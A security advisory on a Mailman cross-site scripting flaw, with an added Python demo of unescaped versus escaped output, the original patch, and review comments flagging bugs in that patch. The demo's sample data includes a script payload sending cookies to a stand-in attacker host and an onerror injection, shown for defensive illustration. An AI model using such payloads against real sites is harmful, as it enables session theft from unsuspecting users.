Mailman Input Validation Error in 'scripts/driver' Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1013494
SecurityTracker URL: http://securitytracker.com/id/1013494
Updated: Mar 28 2005
Original Entry Date: Mar 21 2005
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available: Yes
Vendor Confirmed: Yes
Version(s): 2.1.5 and prior versions
An input validation vulnerability was reported in Mailman when printing error messages. A remote user can conduct cross-site scripting attacks.
The 'scripts/driver' CGI wrapper catches unhandled exceptions from the Mailman CGI programs and prints a diagnostic HTML page containing the Python traceback and a table of every environment variable. It does not escape the '<', '>' and '&' characters in those values. Because the web server copies request data verbatim into CGI variables such as QUERY_STRING, HTTP_REFERER and HTTP_USER_AGENT, a remote user can create a specially crafted URL (designed to trigger a Mailman error) that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Mailman software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
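As an added example (not Mailman's code, and not part of the advisory or of Florian Weimer's message), the following Python 3 script reproduces the pattern the patch addresses: the error page prints every CGI environment variable into a table, and variables such as QUERY_STRING and HTTP_REFERER are copied verbatim from the request. The environment dictionary and the exception are constructed for the demonstration; the escaper is xml.sax.saxutils.escape, the same one the fix imports. The function names are the example's own.

```python
"""Added example: unescaped versus escaped rendering of a CGI environment
dump, mirroring the loop patched in Mailman's scripts/driver.

Not Mailman code. Python 3. The environment below is constructed for the
demonstration; the escaper is xml.sax.saxutils.escape, as in the fix.
"""
from xml.sax.saxutils import escape

# Constructed CGI environment. The web server fills QUERY_STRING,
# HTTP_REFERER and HTTP_USER_AGENT straight from the request, so an
# attacker controls their contents byte for byte.
SAMPLE_ENVIRON = {
    "SERVER_SOFTWARE": "Apache",
    "SCRIPT_NAME": "/mailman/listinfo",
    "QUERY_STRING": 'x=<script>document.location="http://attacker.invalid/?"'
                    '+document.cookie</script>&y=1',
    "HTTP_REFERER": "http://example.invalid/<img src=x onerror=alert(1)>",
}


def environment_rows_vulnerable(environ):
    """Pre-fix behaviour: raw keys and values dropped into table cells."""
    rows = []
    for k, v in sorted(environ.items()):
        rows.append("<tr><td><tt> %s </tt></td><td> %s </td></tr>" % (k, v))
    return "\n".join(rows)


def environment_rows_fixed(environ):
    """Post-fix behaviour: every key and value goes through the entity escaper.

    escape() rewrites '&', '<' and '>' by default, which is sufficient for
    element content between <td> and </td>; it does not touch '"', so the
    same call would not be enough inside an attribute value.
    """
    rows = []
    for k, v in sorted(environ.items()):
        rows.append("<tr><td><tt> %s </tt></td><td> %s </td></tr>"
                    % (escape(k), escape(v)))
    return "\n".join(rows)


def exception_line(exc_type, exc_value):
    """Escaped form of the driver's '[exc: ..., var: ...]' fallback line.

    exc_type is a class and exc_value an instance; neither is a str, so
    each is stringified before escaping, and the result is passed to the
    % operator as a tuple (a list would be treated as one argument).
    """
    return "[exc: %s, var: %s]" % tuple(escape(str(x))
                                        for x in (exc_type, exc_value))


def contains_live_markup(html, tag="<script>"):
    """Crude check: does the literal tag survive into the page unescaped?"""
    return tag in html


if __name__ == "__main__":
    print("--- vulnerable ---")
    print(environment_rows_vulnerable(SAMPLE_ENVIRON))
    print("--- fixed ---")
    print(environment_rows_fixed(SAMPLE_ENVIRON))
    print(exception_line(ValueError, ValueError("<bad value>")))
```

The vulnerable renderer returns the `<script>` element intact, so a browser loading the error page executes it in the Mailman site's origin; the fixed renderer returns `&lt;script&gt;`, which the browser displays as text. The exception helper shows the extra step the traceback hunk needs: the objects from sys.exc_info() must be converted to strings before escaping.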
Florian Weimer reported this vulnerability.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Mailman software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: A fix has been committed to the Mailman CVS repository; the reporter's patch is reproduced in the source message below.
Vendor URL: mailman.sourceforge.net/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any)
This archive entry has one or more follow-up message(s) listed below.|
Source Message Contents
Subject: [CVE-2004-1177] cross-site scripting in scripts/driver
scripts/driver does not properly escape the <>& characters when it
prints the environment once an error is detected.
A fix has been committed to the Mailman CVS repository. My patch for
this issue is attached below.
(I'm not sure if woody is affected or not.)
diff -urNad mailman-2.1.5/scripts/driver /tmp/dpep.mzDE9X/mailman-2.1.5/scripts/driver
--- mailman-2.1.5/scripts/driver 2004-12-22 14:41:22.000000000 +0100
+++ /tmp/dpep.mzDE9X/mailman-2.1.5/scripts/driver 2004-12-22 14:41:22.000000000 +0100
@@ -30,6 +30,9 @@
# printed in the error logs.
STEALTH_MODE = 0
+# This will be set to the entity escaper.
+escape = None
# This standard driver script is used to run CGI programs, wrapped in code
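Review bot: the placeholder `escape = None` in this hunk carries no warning that it is only populated later, inside run_main, and only when STEALTH_MODE is 0; a call site that runs before that point, or outside an `if not STEALTH_MODE:` guard, fails with `TypeError: 'NoneType' object is not callable` from inside the error handler, masking the exception that was being reported. Extend the comment to state both conditions, e.g. "Set in run_main when STEALTH_MODE is 0; only call under `if not STEALTH_MODE:`".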
@@ -57,6 +60,19 @@
# creation of the real logger below fails, we can still get
# *something* meaningful.
logger = None
+ # We need the entity escaper if we want to run in non-stealth
+ # mode.
+ global STEALTH_MODE, escape
+ if not STEALTH_MODE:
+ import xml.sax.saxutils
+ escape = xml.sax.saxutils.escape
+ if escape is None:
+ STEALTH_MODE = 1
# Map stderr to a logger, if possible.
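Review bot: the fallback `if escape is None: STEALTH_MODE = 1` cannot fire for the case it appears to guard. If `import xml.sax.saxutils` fails it raises ImportError straight out of run_main rather than leaving `escape` as None, and if STEALTH_MODE was already 1 the assignment is a no-op. Wrap the import, e.g. `try: import xml.sax.saxutils; escape = xml.sax.saxutils.escape` / `except ImportError: escape = None`, so that a broken installation (the situation this driver exists to report) degrades to stealth mode instead of dying before any diagnostic is written.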
@@ -150,10 +166,12 @@
+ for line in traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback):
+ print escape(line),
print '[failed to import module traceback]'
- print '[exc: %s, var: %s]' % sys.exc_info()[0:2]
+ print '[exc: %s, var: %s]' % map(escape, sys.exc_info()[0:2])
print '''<p>Please inform the webmaster for this site of this
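Review bot: the line `print '[exc: %s, var: %s]' % map(escape, sys.exc_info()[0:2])` is broken on two counts. In Python 2 `map` returns a list, and `%` treats a list as a single argument, so the format raises `TypeError: not enough arguments for format string`; and `sys.exc_info()[0:2]` holds an exception class and an exception instance, neither of which has the `.replace` method that `xml.sax.saxutils.escape` calls on its argument. The original line worked because the slice is a tuple and `%s` stringifies each object. Use `% tuple([escape(str(x)) for x in sys.exc_info()[0:2]])`. This branch only runs when the traceback module cannot be imported, so it will rarely execute and will not be caught by ordinary testing.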
@@ -221,7 +239,7 @@
for k, v in os.environ.items():
- print '<tr><td><tt>', k, '</tt></td><td>', v, '</td></tr>'
+ print '<tr><td><tt>', escape(k), '</tt></td><td>', escape(v), '</td></tr>'
print '<p><hr>[failed to import module os]'
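Review bot: `escape(k)` and `escape(v)` with the default entity table rewrite only `&`, `<` and `>`, which is sufficient here because both land as element content between `<td>` and `</td>`; add a one-line comment saying so, since the same call would be insufficient if a value were ever placed inside an attribute (`"` is left untouched by default and would need `escape(v, {'"': '&quot;'})`). Both calls are correctly placed on the line inside the `for k, v in os.environ.items():` loop, so every variable, not just known request headers, is covered.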